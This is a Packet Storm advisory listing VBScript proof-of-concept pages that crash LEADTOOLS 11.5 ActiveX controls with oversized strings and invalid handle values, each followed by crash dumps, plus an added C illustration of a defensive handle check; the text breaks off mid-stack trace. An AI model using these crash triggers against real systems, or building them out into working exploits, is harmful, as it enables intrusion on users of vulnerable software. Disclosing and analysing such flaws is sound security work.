LEADTOOLS 11.5.0.9 Access Violation

Packet Storm ID: PACKETSTORM:95586
Author: Matthew Bergin
Published: Nov 08, 2010
Source: packetstormsecurity.com
=====================================  
<html>  
Test Exploit Page  
<object classid='clsid:00110060-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /></object>  
<script language='vbscript'>  
targetFile = "C:\Program Files\Rational\common\ltdlg11n.ocx"  
prototype = "Function GetColorRes ( ByVal hWnd As Long ) As Integer"  
memberName = "GetColorRes"  
progid = "LEADDlgLib.LEADDlg"  
argCount = 1  
  
arg1=-1  
  
target.GetColorRes arg1  
  
</script>  
  
  
Exception Code: ACCESS_VIOLATION  
Disasm: 7E428FB5 MOV [EAX],ECX  
  
Seh Chain:  
--------------------------------------------------  
1 73352960 VBSCRIPT.dll  
2 7C839AD8 KERNEL32.dll  
  
  
Called From Returns To   
--------------------------------------------------  
USER32.7E428FB5 LTKRN11n.2000A033   
  
  
Registers:  
--------------------------------------------------  
EIP 7E428FB5 -> 8B044689  
EAX 7713643C -> 8B044689  
EBX 00000000  
ECX 00000000  
EDX 00000001  
EDI 02AB1FE0 -> 00000000  
ESI 771363F8 -> F33BF08B  
EBP 0013EC60 -> 00000000  
ESP 0013EC60 -> 00000000  
  
  
Block Disassembly:  
--------------------------------------------------  
7E428FA8 PUSH EBP  
7E428FA9 MOV EBP,ESP  
7E428FAB MOV EAX,[EBP+8]  
7E428FAE TEST EAX,EAX  
7E428FB0 JE SHORT 7E428FCC  
7E428FB2 MOV ECX,[EBP+C]  
7E428FB5 MOV [EAX],ECX <--- CRASH  
7E428FB7 MOV ECX,[EBP+10]  
7E428FBA MOV [EAX+4],ECX  
7E428FBD MOV ECX,[EBP+14]  
7E428FC0 MOV [EAX+8],ECX  
7E428FC3 MOV ECX,[EBP+18]  
7E428FC6 MOV [EAX+C],ECX  
7E428FC9 XOR EAX,EAX  
7E428FCB INC EAX  
  
  
ArgDump:  
--------------------------------------------------  
EBP+8 7713643C -> 8B044689  
EBP+12 00000000  
EBP+16 00000000  
EBP+20 00000000  
EBP+24 00000000  
EBP+28 02AB1FE0 -> 00000000  
  
  
Stack Dump:  
--------------------------------------------------  
13EC60 00 00 00 00 33 A0 00 20 3C 64 13 77 00 00 00 00 [.........d.w....]  
13EC70 00 00 00 00 00 00 00 00 00 00 00 00 E0 1F AB 02 [................]  
13EC80 D4 EC 13 00 20 1A FF 1F F8 63 13 77 E0 1F AB 02 [.........c.w....]  
13EC90 B4 ED 13 00 3A 11 BE 1F D4 EC 13 00 AC ED 13 00 [................]  
13ECA0 E0 1F AB 02 58 1F AB 02 F8 1E AB 02 00 00 00 00 [....X...........]  
  
  
  
ApiLog  
--------------------------------------------------  
  
***** Installing Hooks *****  
7c821a94 CreateFileA(C:\WINDOWS\system32\rsaenh.dll)  
7c821a94 CreateFileA(C:\WINDOWS\system32\rsaenh.dll)  
  
=====================================  
<html>  
Test Exploit Page  
<object classid='clsid:00110060-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /></object>  
<script language='vbscript'>  
targetFile = "C:\Program Files\Rational\common\ltdlg11n.ocx"  
prototype = "Property Let Bitmap As Long"  
memberName = "Bitmap"  
progid = "LEADDlgLib.LEADDlg"  
argCount = 1  
  
arg1=-1  
  
target.Bitmap = arg1  
  
</script>  
  
  
Exception Code: ACCESS_VIOLATION  
Disasm: AA62D2 CMP DWORD PTR [EAX],6461656C  
  
Seh Chain:  
--------------------------------------------------  
1 73352960 VBSCRIPT.dll  
2 7C839AD8 KERNEL32.dll  
  
  
Called From Returns To   
--------------------------------------------------  
  
  
Registers:  
--------------------------------------------------  
EIP 00AA62D2  
EAX 00000000  
EBX 7C80FF22 -> A868146A  
ECX 02AB2128 -> 00000000  
EDX 00150608 -> 7C97E5A0  
EDI 02AB2128 -> 00000000  
ESI 02AB1F58 -> 00AB07C0  
EBP FFFFFFFF  
ESP 0013ED98 -> 00AA6292  
  
  
Block Disassembly:  
--------------------------------------------------  
AA62BE POP EBX  
AA62BF RETN 8  
AA62C2 PUSH DWORD PTR [ESP+4]  
AA62C6 CALL [AB00EC]  
AA62CC MOV ECX,[ESP+8]  
AA62D0 MOV [ECX],EAX  
AA62D2 CMP DWORD PTR [EAX],6461656C <--- CRASH  
AA62D8 JE SHORT 00AA62DF  
AA62DA AND DWORD PTR [ECX],0  
AA62DD JMP SHORT 00AA62E2  
AA62DF MOV EAX,[EAX+8]  
AA62E2 RETN 8  
AA62E5 PUSH ESI  
AA62E6 MOV ESI,[ESP+8]  
AA62EA LEA ECX,[ESI-60]  
  
  
Stack Dump:  
--------------------------------------------------  
13ED98 92 62 AA 00 FF FF FF FF 28 21 AB 02 00 00 00 00 [.b..............]  
13EDA8 AC 60 1A 00 CC ED 13 00 C0 07 AB 00 D9 5C 13 77 [.`...........\.w]  
13EDB8 58 1F AB 02 FF FF FF FF 00 EE 13 00 B0 A0 B1 02 [X...............]  
13EDC8 C0 ED 13 00 5C EE 13 00 E8 62 13 77 58 1F AB 02 [....\....b.wX...]  
13EDD8 60 00 00 00 04 00 00 00 0A 00 00 00 01 00 00 00 [`...............]  
  
  
  
ApiLog  
--------------------------------------------------  
  
***** Installing Hooks *****  
7c821a94 CreateFileA(C:\WINDOWS\system32\rsaenh.dll)  
7c821a94 CreateFileA(C:\WINDOWS\system32\rsaenh.dll)  
  
  
=====================================  
<html>  
Test Exploit Page  
<object classid='clsid:00110200-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /></object>  
<script language='vbscript'>  
targetFile = "C:\Program Files\Rational\common\lttmb11n.ocx"  
prototype = "Function BrowseDir ( ByVal pszDirectory As String ) As Integer"  
memberName = "BrowseDir"  
progid = "LEADThumbLib.LEADThumb"  
argCount = 1  
  
arg1=String(4116, "A")  
  
target.BrowseDir arg1  
  
</script>  
  
  
Exception Code: ACCESS_VIOLATION  
Disasm: 7C80BE74 MOV CL,[EAX]  
  
Seh Chain:  
--------------------------------------------------  
1 7C839AD8 KERNEL32.dll  
2 73352960 VBSCRIPT.dll  
3 7C839AD8 KERNEL32.dll  
  
  
Called From Returns To   
--------------------------------------------------  
KERNEL32.7C80BE74 LTTMB11n.AC1153   
LTTMB11n.AC1153 OLEAUT32.77135CD9   
OLEAUT32.77135CD9 OLEAUT32.771362E8   
OLEAUT32.771362E8 lttmb11n.AA6E11   
lttmb11n.AA6E11 lttmb11n.AA27C9   
lttmb11n.AA27C9 VBSCRIPT.73303EB7   
VBSCRIPT.73303EB7 VBSCRIPT.73303E27   
VBSCRIPT.73303E27 VBSCRIPT.73303397   
VBSCRIPT.73303397 VBSCRIPT.73303D88   
VBSCRIPT.73303D88 VBSCRIPT.7330409F   
VBSCRIPT.7330409F VBSCRIPT.733063EE   
VBSCRIPT.733063EE VBSCRIPT.73306373   
VBSCRIPT.73306373 VBSCRIPT.73306BA5   
VBSCRIPT.73306BA5 VBSCRIPT.73306D9D   
VBSCRIPT.73306D9D VBSCRIPT.73305103   
VBSCRIPT.73305103 SCROBJ.5CE44396   
SCROBJ.5CE44396 SCROBJ.5CE4480B   
SCROBJ.5CE4480B SCROBJ.5CE446A6   
SCROBJ.5CE446A6 SCROBJ.5CE44643   
SCROBJ.5CE44643 SCROBJ.5CE44608   
SCROBJ.5CE44608 1013C93   
1013C93 1006B0C   
1006B0C 100332C   
100332C 1003105   
1003105 1003076   
1003076 1002F16   
1002F16 KERNEL32.7C817077   
  
  
Registers:  
--------------------------------------------------  
EIP 7C80BE74  
EAX 41414141  
EBX 00000000  
ECX 41414141  
EDX 41414142  
EDI 00AA46E9 -> 8BEC8B55  
ESI FFFFFFF6  
EBP 0013C560 -> 0013EDAC  
ESP 0013C53C -> 00AA46E9  
  
  
Block Disassembly:  
--------------------------------------------------  
7C80BE5D CALL 7C8024D6  
7C80BE62 MOV EAX,[EBP+8]  
7C80BE65 TEST EAX,EAX  
7C80BE67 JE 7C836665  
7C80BE6D AND DWORD PTR [EBP-4],0  
7C80BE71 LEA EDX,[EAX+1]  
7C80BE74 MOV CL,[EAX] <--- CRASH  
7C80BE76 INC EAX  
7C80BE77 TEST CL,CL  
7C80BE79 JNZ SHORT 7C80BE74  
7C80BE7B SUB EAX,EDX  
7C80BE7D OR DWORD PTR [EBP-4],FFFFFFFF  
7C80BE81 CALL 7C802511  
7C80BE86 RETN 4  
7C80BE89 NOP  
  
  
ArgDump:  
--------------------------------------------------  
EBP+8 41414141  
EBP+12 0013EDAC -> 0013EDCC  
EBP+16 00000008  
EBP+20 02231F58 -> 00AAA628  
EBP+24 0013CD70 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
EBP+28 00000000  
  
  
Stack Dump:  
--------------------------------------------------  
13C53C E9 46 AA 00 F6 FF FF FF 00 00 00 00 3C C5 13 00 [.F..............]  
13C54C AC F1 13 00 AC F1 13 00 D8 9A 83 7C 90 BE 80 7C [................]  
13C55C 00 00 00 00 AC ED 13 00 53 11 AC 00 41 41 41 41 [........S.......]  
13C56C AC ED 13 00 08 00 00 00 58 1F 23 02 70 CD 13 00 [........X...p...]  
13C57C 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 [................]  
  
  
  
Exception Code: ACCESS_VIOLATION  
Disasm: AC115A CMP BYTE PTR [ECX+EAX-1],5C  
  
Seh Chain:  
--------------------------------------------------  
1 73352960 VBSCRIPT.dll  
2 7C839AD8 KERNEL32.dll  
  
  
Called From Returns To   
--------------------------------------------------  
LTTMB11n.AC115A OLEAUT32.77135CD9   
OLEAUT32.77135CD9 OLEAUT32.771362E8   
OLEAUT32.771362E8 lttmb11n.AA6E11   
lttmb11n.AA6E11 lttmb11n.AA27C9   
lttmb11n.AA27C9 VBSCRIPT.73303EB7   
VBSCRIPT.73303EB7 VBSCRIPT.73303E27   
VBSCRIPT.73303E27 VBSCRIPT.73303397   
VBSCRIPT.73303397 VBSCRIPT.73303D88   
VBSCRIPT.73303D88 VBSCRIPT.7330409F   
VBSCRIPT.7330409F VBSCRIPT.733063EE   
VBSCRIPT.733063EE VBSCRIPT.73306373   
VBSCRIPT.73306373 VBSCRIPT.73306BA5   
VBSCRIPT.73306BA5 VBSCRIPT.73306D9D   
VBSCRIPT.73306D9D VBSCRIPT.73305103   
VBSCRIPT.73305103 SCROBJ.5CE44396   
SCROBJ.5CE44396 SCROBJ.5CE4480B   
SCROBJ.5CE4480B SCROBJ.5CE446A6   
SCROBJ.5CE446A6 SCROBJ.5CE44643   
SCROBJ.5CE44643 SCROBJ.5CE44608   
SCROBJ.5CE44608 1013C93   
1013C93 1006B0C   
1006B0C 100332C   
100332C 1003105   
1003105 1003076   
1003076 1002F16   
1002F16 KERNEL32.7C817077   
  
  
Registers:  
--------------------------------------------------  
EIP 00AC115A  
EAX 00000000  
EBX 00000000  
ECX 41414141  
EDX 00000000  
EDI 00AA46E9 -> 8BEC8B55  
ESI FFFFFFF6  
EBP 0013EDAC -> 0013EDCC  
ESP 0013C56C -> 0013EDAC  
  
  
Block Disassembly:  
--------------------------------------------------  
AC113E PUSH EAX  
AC113F CALL [ACE1B0]  
AC1145 MOV ECX,[ESP+7B4]  
AC114C PUSH ECX  
AC114D CALL [ACE1AC]  
AC1153 MOV ECX,[ESP+7B4]  
AC115A CMP BYTE PTR [ECX+EAX-1],5C <--- CRASH  
AC115F JE SHORT 00AC1171  
AC1161 LEA EAX,[ESP+68]  
AC1165 PUSH ACA03C  
AC116A PUSH EAX  
AC116B CALL [ACE1A8]  
AC1171 MOV EAX,[ESP+7B8]  
AC1178 LEA ECX,[ESP+68]  
AC117C PUSH EAX  
  
  
ArgDump:  
--------------------------------------------------  
EBP+8 02231F58 -> 00AAA628  
EBP+12 00184934 -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA  
EBP+16 0013EE10 -> 00000000  
EBP+20 0013EE00 -> 00130000  
EBP+24 02281A50 -> 00000038  
EBP+28 0013EDC0 -> 0013EE00  
  
  
Stack Dump:  
--------------------------------------------------  
13C56C AC ED 13 00 08 00 00 00 58 1F 23 02 70 CD 13 00 [........X...p...]  
13C57C 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 [................]  
13C58C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [................]  
13C59C 1C 00 00 00 96 00 00 00 96 00 00 00 00 02 00 00 [................]  
13C5AC 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 [................]  
  
  
  
ApiLog  
--------------------------------------------------  
  
***** Installing Hooks *****  
7c821a94 CreateFileA(C:\WINDOWS\system32\rsaenh.dll)  
7c821a94 CreateFileA(C:\WINDOWS\system32\rsaenh.dll)  
  
=====================================  
<html>  
Test Exploit Page  
  
<object classid='clsid:00110100-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /></object>  
<script language='vbscript'>  
targetFile = "C:\Program Files\Rational\common\ltlst11n.ocx"  
prototype = "Function Insert ( ByVal Bitmap As Long , ByVal pszText As String , ByVal Data As Long ) As Integer"  
memberName = "Insert"  
progid = "LEADImgListLib.LEADImgList"  
argCount = 3  
  
arg1=1  
arg2="defaultV"  
arg3=-2147483647  
  
target.Insert arg1 ,arg2 ,arg3  
  
</script>  
  
Exception Code: ACCESS_VIOLATION  
Disasm: 7C809EDA MOV AL,[EDX]  
  
Seh Chain:  
--------------------------------------------------  
1 7C839AD8 KERNEL32.dll  
2 7C839AD8 KERNEL32.dll  
3 73352960 VBSCRIPT.dll  
4 7C839AD8 KERNEL32.dll  
  
  
Called From Returns To   
--------------------------------------------------  
KERNEL32.7C809EDA KERNEL32.7C834E80   
KERNEL32.7C834E80 ltlst11n.AA1104   
ltlst11n.AA1104 OLEAUT32.77135CD9   
OLEAUT32.77135CD9 OLEAUT32.771362E8   
OLEAUT32.771362E8 ltlst11n.AAAAB2   
ltlst11n.AAAAB2 ltlst11n.AA45C5   
ltlst11n.AA45C5 VBSCRIPT.73303EB7   
VBSCRIPT.73303EB7 VBSCRIPT.73303E27   
VBSCRIPT.73303E27 VBSCRIPT.73303397   
VBSCRIPT.73303397 VBSCRIPT.73303D88   
VBSCRIPT.73303D88 VBSCRIPT.7330409F   
VBSCRIPT.7330409F VBSCRIPT.733063EE   
VBSCRIPT.733063EE VBSCRIPT.73306373   
VBSCRIPT.73306373 VBSCRIPT.73306BA5   
VBSCRIPT.73306BA5 VBSCRIPT.73306D9D   
VBSCRIPT.73306D9D VBSCRIPT.73305103   
VBSCRIPT.73305103 SCROBJ.5CE44396   
SCROBJ.5CE44396 SCROBJ.5CE4480B   
SCROBJ.5CE4480B SCROBJ.5CE446A6   
SCROBJ.5CE446A6 SCROBJ.5CE44643   
SCROBJ.5CE44643 SCROBJ.5CE44608   
SCROBJ.5CE44608 1013C93   
1013C93 1006B0C   
1006B0C 100332C   
100332C 1003105   
1003105 1003076   
1003076 1002F16   
1002F16 KERNEL32.7C817077   
  
  
Registers:  
--------------------------------------------------  
EIP 7C809EDA  
EAX 00000001  
EBX 00000001  
ECX 02650B60 -> 00AB7948  
EDX 00000001  
EDI 00000001  
ESI 00001000  
EBP 0013ED20 -> 0013ED60  
ESP 0013ECF4 -> 00000000  
  
  
Block Disassembly:  
--------------------------------------------------  
7C809EC2 TEST EDX,EDX  
7C809EC4 JE 7C80BFD0  
7C809ECA LEA EDI,[EDX+EAX-1]  
7C809ECE CMP EDI,EDX  
7C809ED0 JB 7C80BFD0  
7C809ED6 AND DWORD PTR [EBP-4],0  
7C809EDA MOV AL,[EDX] <--- CRASH  
7C809EDC LEA EAX,[ESI-1]  
7C809EDF NOT EAX  
7C809EE1 MOV ECX,EAX  
7C809EE3 AND ECX,EDX  
7C809EE5 MOV [EBP-1C],ECX  
7C809EE8 AND EAX,EDI  
7C809EEA MOV [EBP-20],EAX  
7C809EED CMP ECX,EAX  
  
  
ArgDump:  
--------------------------------------------------  
EBP+8 00000001  
EBP+12 00000001  
EBP+16 00000000  
EBP+20 02650BC0 -> 00AB77F0  
EBP+24 00000000  
EBP+28 0013EDB4 -> 00181884  
  
  
Stack Dump:  
--------------------------------------------------  
13ECF4 00 00 00 00 C0 0B 65 02 01 00 00 00 02 00 00 00 [......e.........]  
13ED04 03 00 00 00 F4 EC 13 00 D0 97 53 00 50 ED 13 00 [..........S.P...]  
13ED14 D8 9A 83 7C 08 9F 80 7C 00 00 00 00 60 ED 13 00 [............`...]  
13ED24 80 4E 83 7C 01 00 00 00 01 00 00 00 00 00 00 00 [.N..............]  
13ED34 C0 0B 65 02 00 00 00 00 B4 ED 13 00 A0 ED 13 00 [..e.............]  
  
  
  
Exception Code: ACCESS_VIOLATION  
Disasm: AA110A CMP DWORD PTR [EAX],6461656C  
  
Seh Chain:  
--------------------------------------------------  
1 73352960 VBSCRIPT.dll  
2 7C839AD8 KERNEL32.dll  
  
  
Called From Returns To   
--------------------------------------------------  
ltlst11n.AA110A OLEAUT32.77135CD9   
OLEAUT32.77135CD9 OLEAUT32.771362E8   
OLEAUT32.771362E8 ltlst11n.AAAAB2   
ltlst11n.AAAAB2 ltlst11n.AA45C5   
ltlst11n.AA45C5 VBSCRIPT.73303EB7   
VBSCRIPT.73303EB7 VBSCRIPT.73303E27   
VBSCRIPT.73303E27 VBSCRIPT.73303397   
VBSCRIPT.73303397 VBSCRIPT.73303D88   
VBSCRIPT.73303D88 VBSCRIPT.7330409F   
VBSCRIPT.7330409F VBSCRIPT.733063EE   
VBSCRIPT.733063EE VBSCRIPT.73306373   
VBSCRIPT.73306373 VBSCRIPT.73306BA5   
VBSCRIPT.73306BA5 VBSCRIPT.73306D9D   
VBSCRIPT.73306D9D VBSCRIPT.73305103   
VBSCRIPT.73305103 SCROBJ.5CE44396   
SCROBJ.5CE44396 SCROBJ.5CE4480B   
SCROBJ.5CE4480B SCROBJ.5CE446A6   
SCROBJ.5CE446A6 SCROBJ.5CE44643   
SCROBJ.5CE44643 SCROBJ.5CE44608   
SCROBJ.5CE44608 1013C93   
1013C93 1006B0C   
1006B0C 100332C   
100332C 1003105   
1003105 1003076   
1003076 1002F16   
1002F16 KERNEL32.7C817077   
  
  
Registers:  
--------------------------------------------------  
EIP 00AA110A  
EAX 00000000  
EBX 00000000  
ECX 0013EDA0 -> 00000000  
EDX 00000000  
EDI 00000000  
ESI 02650BC0 -> 00AB77F0  
EBP 0013EDA4 -> 0013EDCC  
ESP 0013ED6C -> 00AA8B02  
  
  
Block Disassembly:  
--------------------------------------------------  
AA10F6 LEAVE  
AA10F7 RETN 8  
AA10FA PUSH DWORD PTR [ESP+4]  
AA10FE CALL [AB7164]  
AA1104 MOV ECX,[ESP+8]  
AA1108 MOV [ECX],EAX  
AA110A CMP DWORD PTR [EAX],6461656C <--- CRASH  
AA1110 JE SHORT 00AA1117  
AA1112 AND DWORD PTR [ECX],0  
AA1115 JMP SHORT 00AA111A  
AA1117 MOV EAX,[EAX+8]  
AA111A RETN 8  
AA111D PUSH EBP  
AA111E MOV EBP,ESP  
AA1120 SUB ESP,20  
  
  
ArgDump:  
--------------------------------------------------  
EBP+8 02650BC0 -> 00AB77F0  
EBP+12 00000001  
EBP+16 00181884 -> Uni: defaultV  
EBP+20 80000001  
EBP+24 0013EE10 -> 00000000  
EBP+28 0013EE00 -> 00130000  
  
  
Stack Dump:  
--------------------------------------------------  
13ED6C 02 8B AA 00 01 00 00 00 A0 ED 13 00 00 00 00 00 [................]  
13ED7C B4 32 18 00 F0 77 AB 00 04 00 00 00 03 00 00 00 [.....w..........]  
13ED8C 30 F0 13 00 7C 52 A5 02 00 00 00 00 FF FF FF FF [.....R..........]  
13ED9C 00 00 00 00 00 00 00 00 CC ED 13 00 D9 5C 13 77 [.............\.w]  
13EDAC C0 0B 65 02 01 00 00 00 84 18 18 00 01 00 00 80 [..e.............]  
  
  
  
ApiLog  
--------------------------------------------------  
  
***** Installing Hooks *****  
7c821a94 CreateFileA(C:\WINDOWS\system32\rsaenh.dll)  
7c821a94 CreateFileA(C:\WINDOWS\system32\rsaenh.dll)  
  
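The Bitmap (ltdlg11n.ocx) and Insert (ltlst11n.ocx) logs above stop on the same instruction shape, CMP DWORD PTR [EAX],6461656C: the Long the script passed is resolved to an object pointer, the result is stored through an out-parameter (MOV [ECX],EAX), and the first dword of the object is compared against 0x6461656C (the bytes "lead" little-endian) before the field at +8 is returned. Nothing tests the lookup result for NULL first, and EAX is 00000000 at the crash in both cases (Bitmap = -1, and Insert with Bitmap = 1 and Data = -2147483647). In the Insert case the first, handled, access violation sits inside a KERNEL32 routine reading from address 1 with a 0x1000 page stride (EDX = 00000001, ESI = 00001000), which is consistent with the Long being probed as a raw pointer. Because these controls are instantiated by CLSID and driven from script, every Long argument is attacker-chosen; note that the harness here was wscript.exe (SCROBJ frames, HEAP[wscript.exe]), so the page does not establish whether IE would instantiate the controls. The C below is an added illustration of that magic check and a defensive rewrite. It is not LEADTOOLS code: the handle table, the struct layout and the names lead_object, lead_register, lead_lookup, resolve_unchecked and resolve_checked are assumptions chosen for the example.

```c
#include <stdint.h>
#include <stdio.h>
#include <stddef.h>

/* "lead" as a little-endian dword: the magic the disassembly compares against. */
#define LEAD_MAGIC 0x6461656Cu

/* Assumed layout: magic at +0, payload pointer at +8, matching
 * "CMP DWORD PTR [EAX],6461656C" followed by "MOV EAX,[EAX+8]". */
typedef struct lead_object {
    uint32_t magic;
    uint32_t reserved;
    void    *payload;
} lead_object;

/* Assumed handle table: handles are 1-based indices into an array only the
 * control itself fills, so a script-supplied Long can never name memory the
 * control did not allocate. */
#define MAX_OBJECTS 8
static lead_object *g_table[MAX_OBJECTS];

/* Register an object; returns its handle (1..MAX_OBJECTS) or 0 when full. */
int32_t lead_register(lead_object *obj)
{
    for (int i = 0; i < MAX_OBJECTS; i++) {
        if (g_table[i] == NULL) {
            g_table[i] = obj;
            return i + 1;
        }
    }
    return 0;
}

/* Resolve a handle; NULL for anything out of range or never registered. */
static lead_object *lead_lookup(int32_t handle)
{
    if (handle < 1 || handle > MAX_OBJECTS)
        return NULL;
    return g_table[handle - 1];
}

/* The shape in the log: store the lookup result, then read the magic through
 * it. When the lookup yields NULL (as it did for -1 and for 1) this faults
 * before the magic test ever runs. */
void *resolve_unchecked(int32_t handle, lead_object **out)
{
    *out = lead_lookup(handle);
    if ((*out)->magic == LEAD_MAGIC)       /* dereferences NULL on a bad handle */
        return (*out)->payload;
    *out = NULL;
    return NULL;
}

/* Defensive version: reject NULL and a wrong magic before touching the object. */
void *resolve_checked(int32_t handle, lead_object **out)
{
    lead_object *obj = lead_lookup(handle);
    if (obj == NULL || obj->magic != LEAD_MAGIC) {
        if (out) *out = NULL;
        return NULL;
    }
    if (out) *out = obj;
    return obj->payload;
}

/* Exercise the checked resolver with one valid object, one object carrying a
 * wrong magic, and the values the fuzzer passed (-1, 1 + table size, INT32_MIN+1).
 * Returns 1 when every case behaves as intended. */
int demo_handles(void)
{
    static char pixels[16];
    static lead_object bmp   = { LEAD_MAGIC,  0, pixels };
    static lead_object bogus = { 0x41414141u, 0, pixels };
    lead_object *seen = NULL;
    int32_t h_ok  = lead_register(&bmp);
    int32_t h_bad = lead_register(&bogus);

    if (resolve_checked(h_ok, &seen) != pixels || seen != &bmp) return 0;
    if (resolve_checked(h_bad, &seen) != NULL || seen != NULL)  return 0;
    if (resolve_checked(-1, &seen) != NULL)                     return 0; /* Bitmap = -1 */
    if (resolve_checked(MAX_OBJECTS + 1, &seen) != NULL)        return 0;
    if (resolve_checked(INT32_MIN + 1, &seen) != NULL)          return 0; /* Insert's Data */
    /* resolve_unchecked(-1, &seen) would dereference NULL here, as in the log. */
    return 1;
}

int main(void)
{
    printf("checked resolver rejects bad handles: %s\n", demo_handles() ? "yes" : "no");
    return 0;
}
```

The table-indexed handle is the real fix: a magic check alone still trusts the script to hand back a pointer the control once created, and a forged object at an attacker-known address would pass it.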
  
=====================================  
<html>  
Test Exploit Page  
<object classid='clsid:00110050-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /></object>  
<script language='vbscript'>  
  
targetFile = "C:\Program Files\Rational\common\ltisi11n.ocx"  
prototype = "Property Let DriverName As String"  
memberName = "DriverName"  
progid = "LEADISISLib.LEADISIS"  
argCount = 1  
  
arg1=String(65535, "A")  
  
target.DriverName = arg1  
  
</script>  
  
  
Exception Code: ACCESS_VIOLATION  
Disasm: 7C80BEB9 MOV [EDX],AL  
  
Seh Chain:  
--------------------------------------------------  
1 7C839AD8 KERNEL32.dll  
2 73352960 VBSCRIPT.dll  
3 7C839AD8 KERNEL32.dll  
  
  
Called From Returns To   
--------------------------------------------------  
KERNEL32.7C80BEB9 ltisi11n.AA1537   
ltisi11n.AA1537 OLEAUT32.77135CD9   
OLEAUT32.77135CD9 OLEAUT32.771362E8   
OLEAUT32.771362E8 ltisi11n.AA64D7   
ltisi11n.AA64D7 ltisi11n.AA319B   
ltisi11n.AA319B VBSCRIPT.73303EB7   
VBSCRIPT.73303EB7 VBSCRIPT.73303E27   
VBSCRIPT.73303E27 VBSCRIPT.73303397   
VBSCRIPT.73303397 VBSCRIPT.73303D88   
VBSCRIPT.73303D88 VBSCRIPT.73311302   
VBSCRIPT.73311302 VBSCRIPT.733063EE   
VBSCRIPT.733063EE VBSCRIPT.73306373   
VBSCRIPT.73306373 VBSCRIPT.73306BA5   
VBSCRIPT.73306BA5 VBSCRIPT.73306D9D   
VBSCRIPT.73306D9D VBSCRIPT.73305103   
VBSCRIPT.73305103 SCROBJ.5CE44396   
SCROBJ.5CE44396 SCROBJ.5CE4480B   
SCROBJ.5CE4480B SCROBJ.5CE446A6   
SCROBJ.5CE446A6 SCROBJ.5CE44643   
SCROBJ.5CE44643 SCROBJ.5CE44608   
SCROBJ.5CE44608 1013C93   
1013C93 1006B0C   
1006B0C 100332C   
100332C 1003105   
1003105 1003076   
1003076 1002F16   
1002F16 KERNEL32.7C817077   
  
  
Registers:  
--------------------------------------------------  
EIP 7C80BEB9 -> AD0013ED  
EAX 0013BD41 -> AD0013ED  
EBX 00AAA760 -> 00AA408F  
ECX 0013CDA4 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
EDX 02A73000  
EDI 0000302A  
ESI 02A71F58 -> 00AAA760  
EBP 0013BD6C -> 0013EDB0  
ESP 0013BD48 -> 0000302A -> Uni: *0*0  
  
  
Block Disassembly:  
--------------------------------------------------  
7C80BEA3 PUSH 7C80BED0  
7C80BEA8 CALL 7C8024D6  
7C80BEAD AND DWORD PTR [EBP-4],0  
7C80BEB1 MOV ECX,[EBP+C]  
7C80BEB4 MOV EDX,[EBP+8]  
7C80BEB7 MOV AL,[ECX]  
7C80BEB9 MOV [EDX],AL <--- CRASH  
7C80BEBB INC ECX  
7C80BEBC INC EDX  
7C80BEBD TEST AL,AL  
7C80BEBF JNZ SHORT 7C80BEB7  
7C80BEC1 OR DWORD PTR [EBP-4],FFFFFFFF  
7C80BEC5 MOV EAX,[EBP+8]  
7C80BEC8 CALL 7C802511  
7C80BECD RETN 8  
  
  
ArgDump:  
--------------------------------------------------  
EBP+8 02A71FD8 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
EBP+12 0013BD7C -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
EBP+16 41414141  
EBP+20 41414141  
EBP+24 41414141  
EBP+28 41414141  
  
  
Stack Dump:  
--------------------------------------------------  
13BD48 2A 30 00 00 58 1F A7 02 60 A7 AA 00 48 BD 13 00 [....X...`...H...]  
13BD58 7C BD 13 00 AC F1 13 00 D8 9A 83 7C D0 BE 80 7C [................]  
13BD68 00 00 00 00 B0 ED 13 00 37 15 AA 00 D8 1F A7 02 [................]  
13BD78 7C BD 13 00 41 41 41 41 41 41 41 41 41 41 41 41 [................]  
13BD88 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................]  
  
  
  
Exception Code: ACCESS_VIOLATION  
Disasm: 7C919084 MOV ECX,[EBX]  
  
Seh Chain:  
--------------------------------------------------  
1 7C90E920 ntdll.dll  
2 7C90E920 ntdll.dll  
3 7C90E920 ntdll.dll  
4 7C90E920 ntdll.dll  
5 73352960 VBSCRIPT.dll  
6 7C839AD8 KERNEL32.dll  
  
  
Called From Returns To   
--------------------------------------------------  
ntdll.7C919084 ntdll.7C96EEA0   
ntdll.7C96EEA0 ntdll.7C94B394   
ntdll.7C94B394 ntdll.7C918F21   
ntdll.7C918F21 ltisi11n.AA69BC   
ltisi11n.AA69BC ltisi11n.AA7189   
ltisi11n.AA7189 ltisi11n.AA154C   
ltisi11n.AA154C OLEAUT32.77135CD9   
OLEAUT32.77135CD9 OLEAUT32.771362E8   
OLEAUT32.771362E8 ltisi11n.AA64D7   
ltisi11n.AA64D7 ltisi11n.AA319B   
ltisi11n.AA319B VBSCRIPT.73303EB7   
VBSCRIPT.73303EB7 VBSCRIPT.73303E27   
VBSCRIPT.73303E27 VBSCRIPT.73303397   
VBSCRIPT.73303397 VBSCRIPT.73303D88   
VBSCRIPT.73303D88 VBSCRIPT.73311302   
VBSCRIPT.73311302 VBSCRIPT.733063EE   
VBSCRIPT.733063EE VBSCRIPT.73306373   
VBSCRIPT.73306373 VBSCRIPT.73306BA5   
VBSCRIPT.73306BA5 VBSCRIPT.73306D9D   
VBSCRIPT.73306D9D VBSCRIPT.73305103   
VBSCRIPT.73305103 SCROBJ.5CE44396   
SCROBJ.5CE44396 SCROBJ.5CE4480B   
SCROBJ.5CE4480B SCROBJ.5CE446A6   
SCROBJ.5CE446A6 SCROBJ.5CE44643   
SCROBJ.5CE44643 SCROBJ.5CE44608   
SCROBJ.5CE44608 1013C93   
1013C93 1006B0C   
